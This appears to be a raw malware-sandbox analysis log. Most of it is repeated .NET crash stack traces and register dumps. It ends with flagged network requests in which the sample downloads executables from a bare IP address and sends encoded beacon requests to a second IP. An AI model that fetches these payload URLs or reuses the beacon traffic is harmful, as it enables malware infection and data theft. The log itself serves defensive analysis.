mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 78 04 b9 50 b3 f5 6d e8 7c 58 9b f9 8d 56 10
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ffc84b
registers.esp: 87943528
registers.edi: 49021824
registers.eax: 0
registers.ebp: 87943640
registers.edx: 117419332
registers.ebx: 43031664
registers.esi: 48369364
registers.ecx: 9406364
1 0 0

__exception__

stacktrace:
0x6bb5fac
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d36ad @ 0x6de336ad
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb029b
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 78 04 b9 50 b3 f5 6d e8 7c 46 9b f9 8d 56 0c
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ffda4b
registers.esp: 87943528
registers.edi: 45076396
registers.eax: 0
registers.ebp: 87943640
registers.edx: 117423053
registers.ebx: 43031664
registers.esi: 50468948
registers.ecx: 9406364
1 0 0

__exception__

stacktrace:
0x6ffda45
0x6bb5fac
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d36ad @ 0x6de336ad
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb029b
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 3b 42 04 7f 73 b9 50 44 2a 01 ba 6d 00 00 00 e8
exception.instruction: cmp eax, dword ptr [edx + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ffa9e7
registers.esp: 87943404
registers.edi: 45877760
registers.eax: 0
registers.ebp: 87943520
registers.edx: 0
registers.ebx: 43031664
registers.esi: 87943404
registers.ecx: 44792064
1 0 0

__exception__

stacktrace:
0x6bb5fac
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d36ad @ 0x6de336ad
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb029b
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 78 04 b9 50 b3 f5 6d e8 7c 46 9b f9 8d 56 0c
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ffda4b
registers.esp: 87943528
registers.edi: 45877760
registers.eax: 0
registers.ebp: 87943640
registers.edx: 117419332
registers.ebx: 43031664
registers.esi: 44792096
registers.ecx: 9406364
1 0 0

__exception__

stacktrace:
0x6bb630c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d36ad @ 0x6de336ad
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb029b
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 78 04 b9 50 b3 f5 6d e8 cc 3a 9b f9 8d 56 10
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ffe5fb
registers.esp: 87943528
registers.edi: 45721280
registers.eax: 0
registers.ebp: 87943640
registers.edx: 117423053
registers.ebx: 43031664
registers.esi: 46820292
registers.ecx: 9406364
1 0 0

__exception__

stacktrace:
0x6ffe5f5
0x6bb630c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d36ad @ 0x6de336ad
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb029b
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 3b 42 04 7f 73 b9 50 44 2a 01 ba 6d 00 00 00 e8
exception.instruction: cmp eax, dword ptr [edx + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ffa9e7
registers.esp: 87943404
registers.edi: 46578464
registers.eax: 0
registers.ebp: 87943520
registers.edx: 0
registers.ebx: 43031664
registers.esi: 87943404
registers.ecx: 45899084
1 0 0

__exception__

stacktrace:
0x6bb630c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d36ad @ 0x6de336ad
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb029b
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 78 04 b9 50 b3 f5 6d e8 cc 3a 9b f9 8d 56 10
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ffe5fb
registers.esp: 87943528
registers.edi: 46578464
registers.eax: 0
registers.ebp: 87943640
registers.edx: 117419332
registers.ebx: 43031664
registers.esi: 45905252
registers.ecx: 9406364
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.67.228.48/host1.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.67.228.48/system32.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.67.228.48/123.txt
suspicious_features Connection to IP address suspicious_request GET http://94.131.112.154/PythonphpGeneratortemporary.php?ffj4evtisdSvL=e2caMa8rTyfUHx&d2903fd8b5e9625169a73c9bf16b0b7c=25907a775ae0c50e6896b3b0f4ed5546&12bb8387f02771b3530361d45f8bc47f=wMwYWY3EWO1IDOhlTMiBjZwgjZmRTZhZGN5YjMzgTYmBzY4YjMygTZ&ffj4evtisdSvL=e2caMa8rTyfUHx
suspicious_features Connection to IP address suspicious_request GET http://94.131.112.154/PythonphpGeneratortemporary.php?JGvO=Epaz1Kj512gUSKaunbDS8tIMq1b&udXBuXppBF=k9NirryZAEUfpr62VhNI9tS&c72f30bfdace9699f08f265105715607=QYyMzYwImY4cjMjJWNzcTZ1ATY0kDZ1MzYkBDZygjM0YGNyQmZlVjZ0IjN1ITNxEDOzADO5QjM&12bb8387f02771b3530361d45f8bc47f=wYjlDMyYDO0YWMwUjNzI2YhVGM0QDZycTN2QjM0YDMlFzNyUmZmFzM&c7b752fd708acb9907ff5fceaaa3c6a8=d1nI1YGN0YmNxEWMygDNmhTZmJDZ0UGMmBjN0MjNihjMxImM3ATNmlzMhJiOiUWY3YGN3kTY1MzYyYWN1YWN5YTMjRjM1MGO5EWY0ImYiwiIwQWMzIjYmhDN2kTZlBTN1cjM0IzYyYzN0MjY2gDNxgTO1UTNyUGOmJiOigTNihjY5UDMlRmYykDOidjY3cDNmNDOxQGNiRmMlhDOis3W
suspicious_features Connection to IP address suspicious_request GET http://94.131.112.154/PythonphpGeneratortemporary.php?JGvO=Epaz1Kj512gUSKaunbDS8tIMq1b&udXBuXppBF=k9NirryZAEUfpr62VhNI9tS&c72f30bfdace9699f08f265105715607=QYyMzYwImY4cjMjJWNzcTZ1ATY0kDZ1MzYkBDZygjM0YGNyQmZlVjZ0IjN1ITNxEDOzADO5QjM&12bb8387f02771b3530361d45f8bc47f=wYjlDMyYDO0YWMwUjNzI2YhVGM0QDZycTN2QjM0YDMlFzNyUmZmFzM&c7b752fd708acb9907ff5fceaaa3c6a8=d1nIzkDO5EDOhRmN5YmMhZWZ4UTYzIjNjhzMjVmN0UWYmNzN3cDNxMzMxIiOiUWY3YGN3kTY1MzYyYWN1YWN5YTMjRjM1MGO5EWY0ImYiwiIwQWMzIjYmhDN2kTZlBTN1cjM0IzYyYzN0MjY2gDNxgTO1UTNyUGOmJiOigTNihjY5UDMlRmYykDOidjY3cDNmNDOxQGNiRmMlhDOis3W
suspicious_features Connection to IP address suspicious_request GET http://94.131.112.154/PythonphpGeneratortemporary.php?JGvO=Epaz1Kj512gUSKaunbDS8tIMq1b&udXBuXppBF=k9NirryZAEUfpr62VhNI9tS&c72f30bfdace9699f08f265105715607=QYyMzYwImY4cjMjJWNzcTZ1ATY0kDZ1MzYkBDZygjM0YGNyQmZlVjZ0IjN1ITNxEDOzADO5QjM&12bb8387f02771b3530361d45f8bc47f=wYjlDMyYDO0YWMwUjNzI2YhVGM0QDZycTN2QjM0YDMlFzNyUmZmFzM&9ff31bbcdffb4b2ee507e80d804540cc=0VfiIiOiEGM0AjZkFmN3YjZjFTZ5MGOyMWO2UGZyMWO0IWYjR2MiwiIzMjYkhTY3QjNlBDNxEWOykzY3YmM3EmMklDN2M2MiNjZ4UGM0MmMzIiOiUWY3YGN3kTY1MzYyYWN1YWN5YTMjRjM1MGO5EWY0ImYiwiIwQWMzIjYmhDN2kTZlBTN1cjM0IzYyYzN0MjY2gDNxgTO1UTNyUGOmJiOigTNihjY5UDMlRmYykDOidjY3cDNmNDOxQGNiRmMlhDOis3W
suspicious_features Connection to IP address suspicious_request GET http://94.131.112.154/PythonphpGeneratortemporary.php?JGvO=Epaz1Kj512gUSKaunbDS8tIMq1b&udXBuXppBF=k9NirryZAEUfpr62VhNI9tS&c72f30bfdace9699f08f265105715607=QYyMzYwImY4cjMjJWNzcTZ1ATY0kDZ1MzYkBDZygjM0YGNyQmZlVjZ0IjN1ITNxEDOzADO5QjM&12bb8387f02771b3530361d45f8bc47f=wYjlDMyYDO0YWMwUjNzI2YhVGM0QDZycTN2QjM0YDMlFzNyUmZmFzM&c7b752fd708acb9907ff5fceaaa3c6a8=d1nI5IDNxMjN1YWZ0MTMmJTN0EGZhlDM4UWZmhTN4UmMhNWO5IGN2ATN3IiOiUWY3YGN3kTY1MzYyYWN1YWN5YTMjRjM1MGO5EWY0ImYiwiIwQWMzIjYmhDN2kTZlBTN1cjM0IzYyYzN0MjY2gDNxgTO1UTNyUGOmJiOigTNihjY5UDMlRmYykDOidjY3cDNmNDOxQGNiRmMlhDOis3W&9ff31bbcdffb4b2ee507e80d804540cc=d1nIiojIhBDNwYGZhZzN2Y2YxUWOjhjMjljNlRmMjlDNiF2YkNjIsISOyQTMzYTNmVGNzEjZyUDNhRWY5ADOlVmZ4UDOlJTYjlTOiRjNwUzNiojIlF2NmRzN5EWNzMmMmVTNmVTO2EzY0ITNjhTOhFGNiJmIsICMkFzMyImZ4QjN5UWZwUTN3IDNyMmM2cDNzImN4QTM4kTN1UjMlhjZiojI4UjY4IWO1ATZkJmM5gjY3I2N3QjZzgTMkRjYkJTZ4gjI7xSfiElZ5oUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlGOqlkNJNkTpRGValmTXpFeNdlT6lFRNNTUX9EeN1WW0k1RaBTWqpleFpXTspEVOh3Yq5EenpmW0MGRPl2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50Z0UUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKNkYxkzVaRVOTlFcOhVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXSTlFbKNjYMJ0QhBjVzIGVCNFTnF1VaBnWXFmaWd0Y6J0QkZXNrlkNJlnW5lTbJNXS55kMjRUT1NmaNh3dT9UMVpmT1NmeNl2bqlka5ckYpdXaJNFdrlkNJNVZ5JlbiFTOykVa3lWSzZ1MixmTslkNJlmY2xmMaxmSul0cJNFZuFTaiZHZzI2TKl2TptGSkBnTtl0cJlWTxUkaMBTTU1UdnRUT5RzUONTRqlkNJN0YwpUelZTS5JWb1c1U3x2aJNXSp1UeRNzYsJlbJZTSTpFdG1GV5ZlMjZlSDxUaNVUV0lkaNVlTWJVVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEGM0AjZkFmN3YjZjFTZ5MGOyMWO2UGZyMWO0IWYjR2MiwiI4cTMkVTM5cjMwAzNhRmZyEDOkJTM2MWY1YWZ1M2N2UDMyEDZwEWOzIiOiUWY3YGN3kTY1MzYyYWN1YWN5YTMjRjM1MGO5EWY0ImYiwiIwQWMzIjYmhDN2kTZlBTN1cjM0IzYyYzN0MjY2gDNxgTO1UTNyUGOmJiOigTNihjY5UDMlRmYykDOidjY3cDNmNDOxQGNiRmMlhDOis3W
suspicious_features Connection to IP address suspicious_request GET http://94.131.112.154/PythonphpGeneratortemporary.php?JGvO=Epaz1Kj512gUSKaunbDS8tIMq1b&udXBuXppBF=k9NirryZAEUfpr62VhNI9tS&c72f30bfdace9699f08f265105715607=QYyMzYwImY4cjMjJWNzcTZ1ATY0kDZ1MzYkBDZygjM0YGNyQmZlVjZ0IjN1ITNxEDOzADO5QjM&12bb8387f02771b3530361d45f8bc47f=wYjlDMyYDO0YWMwUjNzI2YhVGM0QDZycTN2QjM0YDMlFzNyUmZmFzM&46784cd6da072d8e9a00a34d02493da5=0VfikjST9EeNRUT6RzQNVXUqR2Y4FTY5ljMkxWMXlVeaVEWjJlVS9UNDRWb5IzY2p0MZBXMFh1YONDZ2JVbiBHZGh1YwpXUp9maJ9mUYlVUKNETpRjMkZXNyEWdWxWS2k0QhBjRHV1aKNjYq5EWhVkSDxUaJl2Tpd2RkhmQWJGaKNjWsh3VaVlSDxUaJl2Tp1ESjdnRVJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTSDJlSKhlW6ZlVihmVHRGVKNETpRjMkZXNyEWdWxWS2kUajxmTYZFdGdlWw4EbJNXSpJ2M50mYyVzVWl2bqlkb1cVWNFzVZxmUzUVa3lWS1R2MiVHdtJmVKl2Tpd2RkhmQWJGaWdEZUp0QMl2aD1WN5VGcll3TJZHbHpVMGVUS1lzVhBDbtJGcadlWFJ0Qh5GbHN1b3F2Z0RlYuNna0AncMl2Tp1EWaVXOHF2d502Yqx2VUl2dplUavpWS6FzVZpmSXpFWKNETpRzRYlHeW1kWGVEVR5kVTVEeGhVd3ZEWjhHbJZTS5NWdWdlW55kMVl2dplUM0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiEGM0AjZkFmN3YjZjFTZ5MGOyMWO2UGZyMWO0IWYjR2MiwiIzMjYkhTY3QjNlBDNxEWOykzY3Y